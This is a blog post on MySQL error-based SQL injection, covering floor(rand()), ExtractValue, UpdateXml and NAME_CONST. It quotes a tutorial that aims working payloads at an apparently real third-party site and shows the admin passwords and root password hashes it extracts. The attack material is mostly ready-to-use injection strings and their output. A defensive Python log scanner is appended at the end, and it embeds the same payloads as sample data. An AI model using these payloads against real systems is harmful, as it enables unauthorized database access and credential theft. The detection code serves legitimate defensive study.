MySQL error-based injection: three techniques using floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Triggering an error with floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. The error occurs because rand(0) yields a fixed sequence rather than true randomness, and MySQL evaluates the GROUP BY key once when looking it up in the temporary table and again when inserting the row, so the same key is produced twice and the duplicate-entry message carries the concatenated value. To retrieve other data, replace the version() expression with another query.
For example, to fetch the admin username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
MySQL error-based injection on newer versions: injecting with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

|---------------|
|     TEST      |
|---------------|
|       1       |
|---------------|

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
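A defender-side complement, added here and not part of the original post or the quoted tutorial: a small Python scanner that URL-decodes request query strings taken from access-log lines and flags the four error-based signatures described on this page (floor(rand(0)*2) together with GROUP BY, extractvalue, updatexml, and NAME_CONST used twice in one derived table). The log lines, client address and path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
def decode_param(raw: str) -> str:
    # URL-decode ('+' and %xx), lower-case and collapse whitespace so spacing variants match.
    return re.sub(r"\s+", " ", unquote_plus(raw)).lower()

def classify(raw: str) -> set:
    """Return the set of error-based injection techniques whose signature appears in raw."""
    q = decode_param(raw)
    hits = set()
    # floor(rand(0)*2) together with GROUP BY: the duplicate-entry technique.
    if re.search(r"floor\s*\(\s*rand\s*\(", q) and re.search(r"\bgroup by\b", q):
        hits.add("floor_rand_groupby")
    # XPath functions: the error text echoes the attacker-controlled XPath argument.
    if re.search(r"\bextractvalue\s*\(", q):
        hits.add("extractvalue")
    if re.search(r"\bupdatexml\s*\(", q):
        hits.add("updatexml")
    # NAME_CONST used twice inside one derived table: "Duplicate column name".
    if len(re.findall(r"\bname_const\s*\(", q)) >= 2:
        hits.add("name_const_dup")
    return hits

# Constructed combined-format access-log lines (not from the post); '+' encodes spaces.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [11/Nov/2015:19:03:41 +0800] "GET /detail.php?id=1+and+(select+1+from+'
    '(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables'
    '+group+by+x)a) HTTP/1.1" 500 0',
    '10.0.0.5 - - [11/Nov/2015:19:03:45 +0800] "GET /detail.php?id=1+and+extractvalue(1,'
    'concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 0',
    '10.0.0.5 - - [11/Nov/2015:19:03:49 +0800] "GET /detail.php?id=1+and+1=(updatexml(1,'
    'concat(0x3a,(select+user())),1)) HTTP/1.1" 500 0',
    '10.0.0.5 - - [11/Nov/2015:19:03:53 +0800] "GET /detail.php?id=330+and+1=(select+*+from+'
    '(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 0',
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(lines):
    """Return (client, path, techniques) for every request carrying one of the signatures."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        path, query = m.group(1).split("?", 1)
        techniques = classify(query)
        if techniques:
            findings.append((line.split(" ", 1)[0], path, sorted(techniques)))
    return findings
```

Matching on the request side catches the attempt before the database error is ever produced; pairing these hits with HTTP 500 responses in the same log narrows them to requests that actually reached a vulnerable query.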